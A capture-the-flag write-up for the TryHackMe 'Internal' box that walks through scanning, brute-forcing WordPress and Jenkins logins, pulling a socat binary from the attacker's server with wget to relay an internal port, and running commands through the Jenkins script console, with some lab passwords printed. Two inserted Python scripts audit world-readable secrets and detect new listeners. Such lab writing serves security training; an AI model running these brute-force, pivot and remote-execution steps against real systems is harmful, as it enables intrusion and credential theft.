
THM - Internal

Summary

Config

sudo vim /etc/hosts

10.10.102.246   internal.thm

System info

  • Apache/2.4.29 (Ubuntu)
  • Linux version 4.15.0-112-generic
  • Distributor ID: Ubuntu
  • Description: Ubuntu 18.04.4 LTS
  • Release: 18.04
  • Codename: bionic

System User - a

USER: aubreanna PASSWORD: bubbxxxxxxx123

System User - root

USER: root PASSWORD: tr0xxxxxx123

WordPress

  • VERSION: 5.4.2
  • USER: admin
  • PASSWORD: my2boys

Phpmyadmin

  • VERSION: 4.6.6deb5
  • URL: http://internal.thm/phpmyadmin/index.php
  • USER: wordpress
  • PASS: wordpress123

Jenkins

USER: admin PASSWORD: sxxxxxx

Configuration

cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 internal

nmap

nmap -sC -sV -p- internal.thm
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster dir

gobuster dir --url http://internal.thm/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url http://internal.thm/blog/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 20
gobuster dir --url http://internal.thm/phpmyadmin/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 20
  • http://internal.thm/ (Apache2 Ubuntu Default Page)
    • http://internal.thm/blog/ (WordPress)
      • http://internal.thm/blog/wp-admin
      • http://internal.thm/blog/wp-content
      • http://internal.thm/blog/wp-includes
      • http://internal.thm/blog/index.php/wp-json/wp/v2/users
        • http://internal.thm/blog/index.php/wp-json/wp/v2/users/1
    • http://internal.thm/javascript/ - 403
      • http://internal.thm/javascript/prototype/ - 403
      • http://internal.thm/javascript/scriptaculous/ - 403
      • http://internal.thm/javascript/jquery/ - 403
    • http://internal.thm/phpmyadmin/ - (phpmyadmin) (4.6.6deb5)
      • http://internal.thm/phpmyadmin/templates - 403
      • http://internal.thm/phpmyadmin/themes/ - 403
      • http://internal.thm/phpmyadmin/libraries/ - 403
      • http://internal.thm/phpmyadmin/setup/ - 401
      • http://internal.thm/phpmyadmin/sql/ - 403
      • http://internal.thm/phpmyadmin/js/ - 403
      • http://internal.thm/phpmyadmin/locale/ - 403
    • http://internal.thm/server-status/ - 403

gobuster vhost

gobuster vhost -u http://internal.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
  • gc._msdcs.internal.thm
  • _domainkey.internal.thm
  • mailing._domainkey.sunnynews.internal.thm
  • mailing._domainkey.info.internal.thm
  • hallam_dev.internal.thm
  • hallam_ad.internal.thm
  • wm_j_b__ruffin.internal.thm
  • 2609_n_www.internal.thm
  • 0907_n_hn.m.internal.thm
  • 0507_n_hn.internal.thm
  • faitspare_mbp.cit.internal.thm
  • sb_0601388345bc6cd8.internal.thm
  • sb_0601388345bc450b.internal.thm
  • api_portal_dev.internal.thm
  • api_web_dev.internal.thm
  • api_webi_dev.internal.thm
  • sklep_test.internal.thm

feroxbuster

feroxbuster --url http://internal.thm -s 200 -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

200 GET 375l 964w 10918c http://internal.thm/
200 GET 328l 3640w 0c http://internal.thm/blog/
200 GET 0l 0w 0c http://internal.thm/blog/wp-content/
200 GET 0l 0w 0c http://internal.thm/blog/wp-content/plugins/
200 GET 26l 359w 0c http://internal.thm/phpmyadmin/

  • http://internal.thm
  • http://internal.thm/
  • http://internal.thm/icons/
  • http://internal.thm/blog/
  • http://internal.thm/icons/small/
  • http://internal.thm/javascript/
  • http://internal.thm/blog/wp-content/
  • http://internal.thm/blog/wp-includes/
  • http://internal.thm/blog/wp-includes/images/
  • http://internal.thm/blog/wp-includes/assets/
  • http://internal.thm/blog/wp-includes/css/
  • http://internal.thm/blog/wp-includes/js/
  • http://internal.thm/blog/wp-includes/blocks/
  • http://internal.thm/blog/wp-includes/widgets/
  • http://internal.thm/blog/wp-content/plugins/
  • http://internal.thm/blog/wp-includes/fonts/
  • http://internal.thm/blog/wp-includes/customize/
  • http://internal.thm/phpmyadmin/
  • http://internal.thm/phpmyadmin/sql/

wpscan

Scan for password

wpscan --url http://internal.thm/blog --passwords /usr/share/wordlists/rockyou.txt --proxy http://localhost:8080
  • Username: admin
  • Password: xxxxxx

Scan for info

wpscan --url http://internal.thm/blog --api-token=.....
  • [+] Headers Server: Apache/2.4.29 (Ubuntu)
  • [+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
  • [+] WordPress readme found: http://internal.thm/blog/readme.html
  • [+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
  • [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
  • [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
  • [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
  • [!] Title: WordPress 5.4 to 5.8 - Lodash Library Update
  • [!] Title: WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor
  • [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
  • [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
  • [!] Title: WordPress < 5.8 - Plugin Confusion
  • [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
  • [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
  • [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
  • [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
  • [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
  • [+] WordPress theme in use: twentyseventeen

linpeas.sh scan as www-data user

www-data@internal:/tmp$ ./linpeas.sh

Basic information

  • OS: Linux version 4.15.0-112-generic
  • User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • Hostname: internal
  • Writable folder: /dev/shm
  • Distributor ID: Ubuntu
  • Description: Ubuntu 18.04.4 LTS
  • Release: 18.04
  • Codename: bionic
  • Sudo version 1.8.21p2
  • /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
  • New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
  • /usr/bin/docker
  • /usr/bin/lxc
  • /usr/sbin/runc

Processes, Crons, Timers, Services and Sockets

...
aubrean+ 1452 0.0 0.0 1148 4 ? Ss 12:15 0:00 _ /sbin/tini -- /usr/local/bin/jenkins.sh
aubrean+ 1494 0.4 12.3 2587808 251972 ? Sl 12:15 0:24 _ java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war
root 1419 0.0 0.1 404800 3464 ? Sl 12:15 0:00 _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.17.0.2 -container-port 8080
...

Hostname, hosts and DNS

internal
127.0.0.1 localhost
127.0.1.1 internal

Active Ports

(netstat -punta || ss --ntpu)

tcp 0 0     127.0.0.1:8080          0.0.0.0:* LISTEN -
tcp 0 0     127.0.0.1:39091         0.0.0.0:* LISTEN -
tcp 0 0     127.0.0.53:53            0.0.0.0:* LISTEN -
tcp 0 0     0.0.0.0:22                  0.0.0.0:* LISTEN -
tcp 0 0     127.0.0.1:3306          0.0.0.0:* LISTEN -
tcp6 0 0    :::80                           :::* LISTEN -
tcp6 0 0    :::22                           :::* LISTEN -

Users Information

uid=33(www-data) gid=33(www-data) groups=33(www-data)

All users & groups

uid=0(root) gid=0(root) groups=0(root)
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)
uid=111(mysql) gid=114(mysql) groups=114(mysql)
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Useful software

  • /usr/bin/base64
  • /usr/bin/ctr
  • /usr/bin/curl
  • /usr/bin/docker
  • /usr/bin/lxc
  • /bin/nc
  • /bin/netcat
  • /usr/bin/perl
  • /usr/bin/php
  • /bin/ping
  • /usr/bin/python
  • /usr/bin/python2
  • /usr/bin/python2.7
  • /usr/bin/python3
  • /usr/bin/python3.6
  • /usr/sbin/runc
  • /usr/bin/sudo
  • /usr/bin/wget

Installed Compilers

  • /snap/core/8268/usr/share/gcc-5
  • /snap/core/9665/usr/share/gcc-5
  • /usr/share/gcc-8

Analyzing Wordpress Files (limit 70)

  • -rw-r--r-- 1 root root 3109 Aug 3 2020 /var/www/html/wordpress/wp-config.php
  • define( 'DB_NAME', 'wordpress' );
  • define( 'DB_USER', 'wordpress' );
  • define( 'DB_PASSWORD', 'wordxxxxxx' );
  • define( 'DB_HOST', 'localhost' );

hosts.allow

/etc/hosts.allow

Message in txt file

cat /opt/wp-save.txt 
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb1xxxxxx
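Both credential leaks on this box (the root-owned but world-readable wp-config.php and the note in /opt/wp-save.txt) come down to the same file-permission mistake. The following audit script is an added example and not part of the original write-up: it flags files that are readable by "other" and contain credential-like content. The regex list and the sample files (placeholder passwords, built in a temporary directory) are constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# Constructed patterns for content that is usually a credential: a WordPress
# DB_PASSWORD define, a user:password line like the one in /opt/wp-save.txt, and
# generic password/secret/token assignments.
SECRET_PATTERNS = [
    re.compile(r"define\(\s*['\"]DB_PASSWORD['\"]", re.I),
    re.compile(r"^[a-z_][a-z0-9_-]*:[^\s:]{6,}$", re.M),
    re.compile(r"\b(password|passwd|secret|token)\b\s*[=:]", re.I),
]


def is_world_readable(path):
    """True when the 'other' read bit is set, i.e. every local account can read it."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def looks_like_secret(text):
    return any(p.search(text) for p in SECRET_PATTERNS)


def audit(paths):
    """Return the paths that are both world-readable and contain credential-like content."""
    findings = []
    for path in paths:
        try:
            with open(path, "r", errors="replace") as fh:
                text = fh.read()
        except OSError:
            continue  # unreadable or vanished: nothing this account could leak
        if is_world_readable(path) and looks_like_secret(text):
            findings.append(path)
    return sorted(findings)


def demo():
    """Recreate the two findings from the box in a throwaway directory (constructed
    contents, placeholder passwords) next to a correctly locked-down copy and a
    harmless file, then return the base names the audit flags."""
    d = tempfile.mkdtemp()
    samples = {
        "wp-config.php": ("define( 'DB_PASSWORD', 'PLACEHOLDER' );\n", 0o644),
        "wp-save.txt": ("Bill,\n\naubreanna:PLACEHOLDER123\n", 0o644),
        "wp-save-locked.txt": ("aubreanna:PLACEHOLDER123\n", 0o600),
        "README": ("nothing sensitive here\n", 0o644),
    }
    for name, (content, mode) in samples.items():
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    flagged = audit(os.path.join(d, name) for name in samples)
    return [os.path.basename(p) for p in flagged]


if __name__ == "__main__":
    print(demo())  # ['wp-config.php', 'wp-save.txt']
```

The locked-down copy (mode 0600) is not reported even though its content is identical, which is the point: the fix for wp-save.txt is to delete it or restrict it to its owner, and for wp-config.php to keep it readable by the web server only (owner root, group www-data, mode 0640) rather than by every local account such as the one the web shell runs as.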

Access to internal resources

Dump configuration

netstat -tulpn | grep LISTEN

tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:45619 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -

Use socat for port forwarding

Template

socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &

Source of socat binary (hacker machine)

git clone https://github.com/andrew-d/static-binaries
cd static-binaries/binaries/linux/x86_64
python3 -m http.server

Get socat and run (target machine)

wget 10.18.9.175:8000/socat
chmod +x socat
./socat TCP-LISTEN:8081,fork TCP:0.0.0.0:8080 &
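The netstat dump above and the socat relay that follows it illustrate the defensive lesson of this section: Jenkins was published only on 127.0.0.1 through docker-proxy, but a loopback bind is not an access control once anyone has a local shell, and the relay turns it into a wildcard listener in one command. The script below is an added example, not part of the write-up: it parses netstat -tulpn rows, lists the loopback-only services that deserve the same credential hardening as public ones, and diffs two snapshots to report ports that are newly bound beyond loopback. Both snapshots are constructed from the listener lines on this page; the 8081 row, its PID and program name are placeholders.

```python
from dataclasses import dataclass

# Constructed sample: listening sockets as printed by `netstat -tulpn | grep LISTEN`,
# mirroring the services found on the box (Jenkins behind docker-proxy on 8080,
# MySQL on 3306, the local resolver on 53, SSH and Apache on all interfaces).
BASELINE = """\
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:45619         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
"""

# Constructed later snapshot: a relay process now listens on every interface on 8081.
# The PID and program name are placeholders, not values observed on the box.
LATER = BASELINE + (
    "tcp        0      0 0.0.0.0:8081            0.0.0.0:*               "
    "LISTEN      4242/socat\n"
)


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    program: str

    @property
    def scope(self):
        """loopback: host-only; wildcard: every interface; interface: one address."""
        if self.addr == "::1" or self.addr.startswith("127."):
            return "loopback"
        if self.addr in ("0.0.0.0", "::"):
            return "wildcard"
        return "interface"


def parse_listeners(output):
    """Parse netstat -tulpn rows into Listener objects; headers and non-listening rows are skipped."""
    listeners = set()
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith(("tcp", "udp")):
            continue
        proto, local = fields[0], fields[3]
        if proto.startswith("tcp"):
            if len(fields) < 7 or fields[5] != "LISTEN":
                continue
            program = fields[6]
        else:
            program = fields[5]  # UDP rows carry no state column
        addr, port = local.rsplit(":", 1)
        listeners.add(Listener(proto, addr, int(port), program))
    return listeners


def loopback_only_services(listeners):
    """(port, program) pairs reachable only from the host itself. Binding to loopback
    is not authentication: anything with a local shell can reach these, so they need
    the same password and patch hygiene as public services."""
    return sorted((l.port, l.program) for l in listeners if l.scope == "loopback")


def newly_exposed(baseline, later):
    """Listeners bound to a non-loopback address now that were absent or loopback-only
    in the baseline. A new wildcard listener owned by an unprivileged account is the
    fingerprint of an ad-hoc relay and is worth an alert."""
    before = {(l.proto, l.port): l.scope for l in baseline}
    exposed = [
        l for l in later
        if l.scope != "loopback" and before.get((l.proto, l.port)) in (None, "loopback")
    ]
    return sorted(exposed, key=lambda l: (l.port, l.proto))


if __name__ == "__main__":
    base, now = parse_listeners(BASELINE), parse_listeners(LATER)
    print("loopback-only:", loopback_only_services(base))
    for l in newly_exposed(base, now):
        print(f"newly exposed: {l.proto} {l.addr}:{l.port} ({l.program})")
```

Run periodically against a saved baseline, the diff catches exactly the change made in this section (a new 0.0.0.0:8081 listener) while ignoring the services that were already public. Host firewall rules that drop inbound connections to ports no service is meant to publish, plus strong credentials on the loopback-only Jenkins and MySQL, are the mitigations the loopback-only list points at.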

New target: Jenkins

URL

http://internal.thm:8081/

Scan for version

use auxiliary/scanner/http/jenkins_enum
setg RHOSTS internal.thm
setg RPORT 8081
setg TARGETURI /
show options
run

[+] 10.10.140.111:8081 - Jenkins Version 2.250

Scan for password

use auxiliary/scanner/http/jenkins_login
setg RHOSTS internal.thm
setg RPORT 8081
setg PASS_FILE /usr/share/wordlists/rockyou.txt
setg USERNAME admin
setg STOP_ON_SUCCESS true
show options

[+] 10.10.158.66:8081 - Login Successful: admin:spongebob

Use jenkins script

  • http://internal.thm:8081/script
println 'whoami'.execute().text
println 'ls -la /'.execute().text
println 'ls -la /home'.execute().text
println 'ls -la /root'.execute().text
println 'ls -la /opt'.execute().text
println 'cat /opt/note.txt'.execute().text

root:tr0ub1xxxxx